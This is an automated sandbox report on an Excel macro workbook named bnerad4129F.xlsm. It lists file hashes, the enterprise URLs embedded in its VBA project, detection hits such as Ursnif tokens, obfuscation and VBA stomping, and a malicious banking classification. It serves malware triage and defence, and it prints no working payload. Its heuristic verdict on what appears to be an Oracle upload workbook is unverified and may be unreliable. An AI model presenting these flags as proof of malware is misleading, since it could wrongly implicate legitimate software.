Windows Analysis Report
bnerad4129F.xlsm

ID:	734111
Product:	CloudBasic
Start time:	06:37:25
Start date:	31.10.2022
Sample:	bnerad4129F.xlsm
Cookbook:	defaultwindowsofficecookbook.jbs
System description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Architecture:	WINDOWS
MD5:	1bb0098ce207236e5a4819560e41a954
SHA1:	5bb00ef5548bd03e1e45f9113497a22de0f95fc6
SHA256:	97450cdcaa220328f6daebf774b425277103dbfe08940b1d5da07f6e2d8dbc49
Filetype:	Excel Microsoft Office Open XML Format document with Macro (52504/1) 52.24%

Name	Type	MD5	SHA1	SHA256
C:\Users\user\AppData\Local\Temp\VBE\MSForms.exd	data	71707F50E67C9AFAC345A16941AF041C	A283A770ED389DE57E07B6EB7D26EFA77168CABE	E3355AB5B7A650721018F03474622DAD41B96C435C15C624D3BF810E93D3C660
C:\Users\user\AppData\Local\Temp\~DF31B384211B18428B.TMP	Composite Document File V2 Document, Cannot read section info	72F5C05B7EA8DD6059BF59F50B22DF33	D5AF52E129E15E3A34772806F6C5FBF132E7408E	1DC0C8D7304C177AD0E74D3D2F1002EB773F4B180685A7DF6BBE75CCC24B0164
C:\Users\user\AppData\Local\Temp\~DFBAA5C34754937DDE.TMP	data	BF619EAC0CDF3F68D496EA9344137E8B	5C3EB80066420002BC3DCC7CA4AB6EFAD7ED4AE5	076A27C79E5ACE2A3D47F9DD2E83E4FF6EA8872B3C2218F66C92B89B55F36560
C:\Users\user\Desktop\~$bnerad4129F.xlsm	data	7AB76C81182111AC93ACF915CA8331D5	68B94B5D4C83A6FB415C8026AF61F3F8745E2559	6A499C020C6F82C54CD991CA52F84558C518CBD310B10623D847D878983A40EF

Compliance

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Networking

Source: vbaProject.bin

Binary string: http://www.oracle.com/bne> - obfuscation quality: 4

Source: vbaProject.bin	String found in binary or memory: http://www.oracle.com/bne
Source: vbaProject.bin	String found in binary or memory: https://ebs-prd.eos.lkqeurope.
Source: vbaProject.bin	String found in binary or memory: https://ebs-prd.eos.lkqeurope.com:443/OA
Source: vbaProject.bin	String found in binary or memory: https://ebs-prd.eos.lkqeurope.com:443/OA_HTML/
Source: vbaProject.bin	String found in binary or memory: https://ebs-prd.eos.lkqeurope.com:443/OA_HTML//
Source: vbaProject.bin	String found in binary or memory: https://ebs-prd.eos.lkqeurope.com:443/OA_HTML//BneUploaderService?bne:tickleSession=Truem:443/
Source: vbaProject.bin	String found in binary or memory: https://ebs-prd.eos.lkqeurope.com:443/OA_HTML/BneApplicationService
Source: vbaProject.bin	String found in binary or memory: https://ebs-prd.eos.lkqeurope.com:443/OA_HTML/BneComponentServiceos.lk
Source: vbaProject.bin	String found in binary or memory: https://ebs-prd.eos.lkqeurope.com:443/OA_HTML/BneDownloadServiceeos.lk(
Source: vbaProject.bin	String found in binary or memory: https://ebs-prd.eos.lkqeurope.com:443/OA_HTML/BneDownloadServiceeos.lk(FM51SOK4ODFJXCML07W7O8HY1PLOC
Source: vbaProject.bin	String found in binary or memory: https://ebs-prd.eos.lkqeurope.com:443/OA_HTML/BneUploaderServiceeos.lk

E-Banking Fraud

Source: Initial sample

OLE, VBA macro line: Ursnif specific tokens

System Summary

Source: bnerad4129F.xlsm	Stream path 'VBA/BneVBAUploader' : found possibly 'ADODB.Stream' functions position, open, read
Source: bnerad4129F.xlsm	Stream path 'VBA/Sheet1' : found possibly 'ADODB.Stream' functions mode, open, read

Source: bnerad4129F.xlsm	OLE, VBA macro line: Public Function UnZip( ZipFile As String, Optional TargetFolderPath As String = vbNullString, Optional OverwriteFile As Boolean = False ) As Boolean
Source: bnerad4129F.xlsm	OLE, VBA macro line: If OverwriteFile Then
Source: bnerad4129F.xlsm	OLE, VBA macro line: Kill Environ("Temp") & "Temporary Directory*"
Source: bnerad4129F.xlsm	OLE, VBA macro line: CallByName objProperty, Me.StylePropertyVBA, VbLet, Me.StylePropertyValue
Source: bnerad4129F.xlsm	OLE, VBA macro line: Set objProperty = CallByName(objProperty, Me.StylePropertyVBA, VbGet)
Source: bnerad4129F.xlsm	OLE, VBA macro line: Set objProperty = CallByName(objProperty, Me.StylePropertyVBA, VbGet, Me.StylePropertyValue)

Source: bnerad4129F.xlsm	Stream path 'VBA/BneRibbon' : found possibly 'XMLHttpRequest' functions response, responsebody, status, open, send
Source: bnerad4129F.xlsm	Stream path 'VBA/BneVBAUploader' : found possibly 'XMLHttpRequest' functions readystate, response, responsexml, status, open, send, setrequestheader
Source: bnerad4129F.xlsm	Stream path 'VBA/Sheet1' : found possibly 'XMLHttpRequest' functions response, status, open, send

Source: bnerad4129F.xlsm	OLE, VBA macro line: Private m_layoutImage As String
Source: bnerad4129F.xlsm	OLE, VBA macro line: m_layoutImage = ""
Source: bnerad4129F.xlsm	OLE, VBA macro line: LayoutImage = m_layoutImage
Source: bnerad4129F.xlsm	OLE, VBA macro line: Public Sub Workbook_Open()
Source: bnerad4129F.xlsm	OLE, VBA macro line: AddBneMsg BNE_ERROR, "Workbook_Open", "Error: " & Err.Number & " " & Err.Description

Source: bnerad4129F.xlsm

OLE indicator, VBA macros: true

Source: ~DF31B384211B18428B.TMP.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: bnerad4129F.xlsm

OLE indicator, Workbook stream: true

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\Desktop\~$bnerad4129F.xlsm

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\{E656762D-7272-4DA5-AD90-1F1FBD4D22C4} - OProcSessId.dat

Jump to behavior

Source: classification engine

Classification label: mal72.bank.expl.evad.winXLSM@1/4@0/0

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Window found: window name: SysTabControl32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Window detected: Number of UI elements: 71

Source: bnerad4129F.xlsm	Initial sample: OLE zip file path = xl/worksheets/sheet4.xml
Source: bnerad4129F.xlsm	Initial sample: OLE zip file path = xl/worksheets/sheet5.xml
Source: bnerad4129F.xlsm	Initial sample: OLE zip file path = xl/worksheets/_rels/sheet5.xml.rels
Source: bnerad4129F.xlsm	Initial sample: OLE zip file path = docProps/custom.xml

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages

Jump to behavior

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

File opened: C:\Windows\SysWOW64\MSVCR100.dll

Jump to behavior

Source: ~DF31B384211B18428B.TMP.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Source: bnerad4129F.xlsm	Stream path 'BneBrowser' : High number of string operations
Source: bnerad4129F.xlsm	Stream path 'VBA/BneBrowser' : High number of string operations
Source: bnerad4129F.xlsm	Stream path 'VBA/BneRibbon' : High number of string operations
Source: bnerad4129F.xlsm	Stream path 'VBA/BneVBAUploader' : High number of string operations
Source: bnerad4129F.xlsm	Stream path 'VBA/Sheet1' : High number of string operations

Hooking and other Techniques for Hiding and Protection

Source: bnerad4129F.xlsm	Stream path 'VBA/__SRP_1' : xor key: 0x20, keywords: writefile
Source: bnerad4129F.xlsm	Stream path 'VBA/__SRP_1' : keywords: writefile

Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX			Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: bnerad4129F.xlsm

OLE indicator, VBA stomping: true